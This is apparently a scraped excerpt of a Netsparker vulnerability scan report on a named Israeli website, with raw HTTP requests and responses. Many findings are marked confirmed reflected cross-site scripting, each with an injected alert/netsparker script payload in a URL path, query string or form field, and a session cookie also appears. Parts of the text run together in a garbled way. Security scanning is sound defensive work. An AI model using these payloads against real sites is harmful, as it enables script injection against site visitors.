ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:11 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/'"-->netsparker(0x00052F)script>style>netsparker(0x0003B2) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 180Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/upload_image.asp?'"-->netsparker(0x0003B2)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:56:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 181Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/alon/archive.asp'"-->netsparker(0x00029F)script>style>
''''-->netsparker(0x000245)
0
3.24. /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0001CB)
RequestGET /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/tags/tags.asp'"-->netsparker(0x0001CB)script>style>netsparker(0x00040D) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:55 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 171Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/+ win +?'"-->netsparker(0x00040D)script>style>
3.26. /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x000127)
RequestGET /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000127)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/jAccordion/default.css'"-->netsparker(0x000127)script>style>
3.28. /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x00046E)
RequestGET /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00046E)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:02:57 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 172Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/reg/'"-->netsparker(0x00046E)script>style>
RequestGET /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FD)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:07 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 168Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/scripts/'"-->netsparker(0x0000FD)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:33 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 186Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/search/default.asp'"-->netsparker(0x0004D2)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:37 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/kaftorim/'"-->netsparker(0x00057E)script>style>
alert(0x000642)
RequestPOST /ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000642)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/ask/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 37Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:07:54 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 186Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/reg/maillingUpdate.asp'"-->netsparker(0x000642)script>style>netsparker(0x0002B1)script>style>
3.39. /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/scri..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0000D7)
RequestGET /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000D7)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:43:52 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 163Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/'"-->netsparker(0x0000D7)script>style>
3.41. /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028..
Parameters
Parameter Type Value
URI-BASED Full URL '"-->alert(0x00028A)
Request
GET /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00028A)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 20 May 2014 13:56:05 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
404;http://www.shalomlaam.co.il:80/site/contact/'"-->netsparker(0x00028A)script>style>
Request
GET /site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002DC)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:55 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/Presentation/'"-->netsparker(0x0002DC)script>style>
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/'"-->netsparker(0x000106)script>style>netsparker(0x0003EB) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:35 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 177
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/getbanner.asp?'"-->netsparker(0x0003EB)script>style>
3.48. /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..
Parameters
Parameter Type Value
URI-BASED Full URL '"-->alert(0x000134)
Request
GET /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000134)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:28 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 177
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/index.html'"-->netsparker(0x000134)script>style>
3.50. /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001..
Parameters
Parameter Type Value
id GET 805
URI-BASED Full URL '"-->alert(0x000195)
Request
GET /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000195)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:46:57 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/answer.asp'"-->netsparker(0x000195)script>style>
3.52. /images/pagetop.asp
CONFIRMED
http://www.shalomlaam.co.il/images/pagetop.asp?'"-->alert(0x0003EA)
Parameters
Parameter Type Value
Query Based Query String '"-->alert(0x0003EA)
Request
GET /images/pagetop.asp?'"-->netsparker(0x0003EA) HTTP/1.1
Referer: http://www.shalomlaam.co.il/images/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 179
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/images/pagetop.asp?'"-->netsparker(0x0003EA)script>style>alert(0x000560)
Request
GET /about/search/default.asp?'"-->netsparker(0x000560) HTTP/1.1
Referer: http://www.shalomlaam.co.il/about/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 185
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/default.asp?'"-->netsparker(0x000560)script>style>
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:49 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/news/'"-->netsparker(0x000400)script>style>netsparker(0x000160)script>style>
3.59. /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..
Parameters
Parameter Type Value
URI-BASED Full URL '"-->alert(0x0000E8)
Request
GET /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E8)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:43:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 183
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/gallery/highslide/'"-->netsparker(0x0000E8)script>style>
3.61. /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"-->alert(0x00011E)
Request
GET /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00011E)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:18 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/home/home_page.css'"-->netsparker(0x00011E)script>style>
3.63. /vod/vod.asp
CONFIRMED
http://www.shalomlaam.co.il/vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..
Parameters
Parameter Type Value
id GET '"-->alert(0x00015D)
Request
GET /vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015D)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response';}
netsparker(0x00015D)_fix.mp4" type="video/mp4">-->
Your browser does not support the video tag.
3.65. /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%..
Parameters
Parameter Type Value
URI-BASED Full URL '"-->alert(0x0004E2)
Request
GET /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E2)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/page/odot/'"-->netsparker(0x0004E2)script>style>netsparker(0x000534) HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:12 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/?'"-->netsparker(0x000534)script>style>
Request
GET /reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D5)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:03 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 182
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/reg/maillingUpdate.asp'"-->netsparker(0x0001D5)script>style>
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:21 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 175
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/search/'"-->netsparker(0x0004A9)script>style>netsparker(0x000234)script>style>
3.72. /maillingUpdate.asp
CONFIRMED
http://www.shalomlaam.co.il/maillingUpdate.asp?'"-->alert(0x000218)
Parameters
Parameter Type Value
Query Based Query String '"-->alert(0x000218)
Request
GET /maillingUpdate.asp?'"-->netsparker(0x000218) HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
